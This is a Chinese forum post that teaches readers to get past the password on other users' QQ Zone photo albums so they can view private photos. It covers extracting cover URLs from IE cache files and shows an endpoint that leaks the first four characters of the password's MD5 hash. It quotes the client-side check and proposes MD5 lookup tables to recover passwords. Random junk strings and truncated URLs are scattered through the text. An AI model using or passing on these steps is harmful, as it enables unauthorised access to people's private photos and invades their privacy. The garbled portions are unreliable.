|
|
现在很多人都拥有QQ空间,并且上传了自己的照片。当你想看看新朋友的庐山真面目,可惜给相册加了密码。是不是很扫兴,现在就教你破解掉这个密码来观看加密相册。
: r& N& \' M9 O6 @7 Q/ V
" x/ Q' n& I6 _+ X) d首先打开一个已经加过密的QQ空间相册页面,然后打开IE“工具-internet-选项”,在“常规”中的“internet临时文件夹”下,依次选择删除“cookies”和“删除文件”删除临时文件夹中所有的cookies和文件,然后再点击“设置”,在“设置窗口”选择“查看文件”,这样就打开了IE临时文件夹。
* @) |: A1 }6 p/ @3 N9 z `2 \) V5 m# W( }* }2 n
然后打开需要破解的加密相册,出现一个对话框需要输入密码,这是选择取消,在刷新一下空间,点击“相册”。作完上面的动作后找到临时文件夹,刷新一下,里面会有一个“cgi_qqzone_static”的XML文档。双击打开它,在弹出的对话框中选择“是”,打开的是一个代码文件。按Ctrl+f查找,输入“我”进行查找,找到<![CDATA[ 我 ]]>这段代码,下面那个地址就是QQ相册的封面地址。复制他就能看到加密图片的封面
8 u) F7 m4 ~- v$ a6 A0 ]! j根据http://izone.qq.com/client/photo ... &album=31931732 9 x$ y' k# B. B0 S( [7 ^& K l" |
下载或者翻看Internet临时文件夹下的 photo_password 文件可查到下列语句: 5 h; w8 C& e% K
type="text/JavaScript" src=https://www.abc369.net/info/way/"/js/md5.js"></script>
3 J$ D9 I9 {4 X* ?+ |" Ydocument.cookie=("album"+albumId+"pwd="+hex_md5(pwd)); : e3 B. `9 B& d) ?% u0 E# [
对比 md5.js文件可知,此v2.1版本的 JavaScript MD5,且输入的密码转化为32位的字符串。
4 r' x# K# I3 U
' _ v e4 d8 M, _比较两个地址:
& x: |, v. @6 D) shttp://photo.qq.com/cgi-bin/izon ... mp;albumid=31931732 % ~0 X" J2 P2 `- H
/*http://izone.qq.com/client/photo ... amp;album=31931732/这个地址类似可以不看*/ % W2 k# H# G1 X, @/ o, v4 h8 m
(此地址为有密码情况下的登陆地址,要求输入密码) 2 l9 v8 S! I4 X
http://photo.qq.com/cgi-bin/izon ... asswd=&mode=big - }! i" i0 N8 G8 l" ^! [
(此地址为无密码情况下的登陆地址)
# i' m2 `+ |$ B0 ]& I* y% k3 W( ~2 f/ j$ d* L+ U
由此可以推断出:
9 m& L3 \( b$ I* U* whttp://photo.qq.com/cgi-bin/izon ... 1931732&passwd=(广告广告广告广告广告*)&mode=big % d1 W' w& ]! e
广告广告为转化后的md5字符串,此地址应该为此地址为有密码情况下的直接登陆地址。
; R( H( y' ^" X4 p9 Y8 R! h' _随便输入一段字符显示如下: 8 K4 P/ y7 m4 m9 ]; P& m3 Z1 c$ E
<?xml version="1.0" encoding="GBK" ?>
3 l0 {4 W# _1 ~<error>密码有误,请重新输入!</error>
9 q- z8 Z8 Q4 f考虑到在前面有密码情况下的登陆窗口连接为cgi_album_pwd,浏览相册连接为cgi_album_view。 $ A3 V; c* O; r# D1 o. a
试将登陆地址改为下列方式:
7 G2 l) B1 N# Yhttp://photo.qq.com/cgi-bin/izon ... 1931732&passwd=(广告广告广告广告广告*)&mode=big
. A6 L( I9 | n: _% E- F# i随便输入一段字符显示如下: & s3 h1 a( b, G1 v6 S
<?xml version="1.0" encoding="GBK" ?>
( p2 T- b1 Z/ u' Z E" T3 {<data id="31931732" owner="23266229" passwd="81dc" />
& t- i" W; K' A) \4 f5 ]经过换算可知,1234的MD5值是81dc9bdb52d04dc20036dbd8313ed055
" e) O5 U3 i, T$ Y测试数次 . q! M6 _ |. l
<?xml version="1.0" encoding="GBK" ?> 9 H; o8 X1 A5 y9 l( o( m9 I, d
<data id="31931732" owner="23266229" passwd="1bbd" />
5 h @" a1 n6 z, q# y, X8 ~密码:11111111 MD5:1bbd886460827015e5d605ed44252251 ' a& b8 u& |9 Q! L" D" g, d
<?xml version="1.0" encoding="GBK" ?>
: \/ M$ `3 _* I" Y# W! r2 @<data id="31931732" owner="23266229" passwd="eccb" />
+ ?% s: x6 F# w- X. j密码:3 MD5:eccbc87e4b5ce2fe28308fd9f2a7baf3 + w$ C4 Z% H+ v/ z2 k+ h1 b
由此可以判断,此处的passwd为密码加密后的前4位。 u% k# {3 Z9 d m: j
photo_password 文件可查到下列语句:
g" O( ?$ @# t/ X& V9 a. Wvar p=""; / j( X3 N3 ?& Z, z A
if (x!=null) p=x.selectSingleNode("/data").getAttribute("passwd"); 3 U1 o0 H; _0 W# S) t2 ^
判断此passwd应该是数据库中的某字段名。 8 c$ x# S' V; d
if (p!="" && hex_md5(pwd).indexOf(p)!=0){
0 k2 y$ N2 N: t6 h7 }6 E9 E/ ]alert("密码错误")
6 j: d& P& I2 X" @( Y2 edocument.getElementById("pass").focus();
6 g0 B' Z, v I G7 b8 C* K1 u+ d, t8 treturn; 1 {5 n$ _/ m3 j& ?0 P! l
} 1 r" \& e! ?4 |
document.cookie=("album"+albumId+"pwd="+hex_md5(pwd)); ; d* g# P" f- W, w
location="/client/photo_static_big.htm?uin="+uin+"&album="+albumId;
! c' S, S: z. C0 z& Jpwd为输入的密码,经过md5加密。判断此处出现的passwd="eccb"应该是验证输入的密文密码的正确性的。如果正确,使用hex_md5(pwd)进行登陆。 & d$ Q: F3 G. ]9 t0 B# @
: F2 i* ]8 s8 C$ @
由于qq相册密码提示为8位,那么如果有心人使用相关工具换算处8位以下的所有数字和字母组合的MD5值做成数据库,那么密码就如同虚设。但是考虑到相册密码意义不大,一般情况下不会有人过于无聊拿机器去跑这东西... 似乎最基本常见的的运算次数为几百万亿次,如果谁又兴趣搞几台服务器跑天把做个数据库倒是蛮好,就是大了点准备个TB级的硬盘矩阵吧。如果怕麻烦可以去国外的几个大型MD5数据库查询
6 G9 }% B: x! u9 Q7 w |
|
|手机版|小黑屋|☆我要吧☆
( 豫ICP备13016831号-1 )
狗仔卡
发表于 2016-4-6 22:05:08
提升卡
置顶卡
锁贴卡
解贴卡
变色卡
显身卡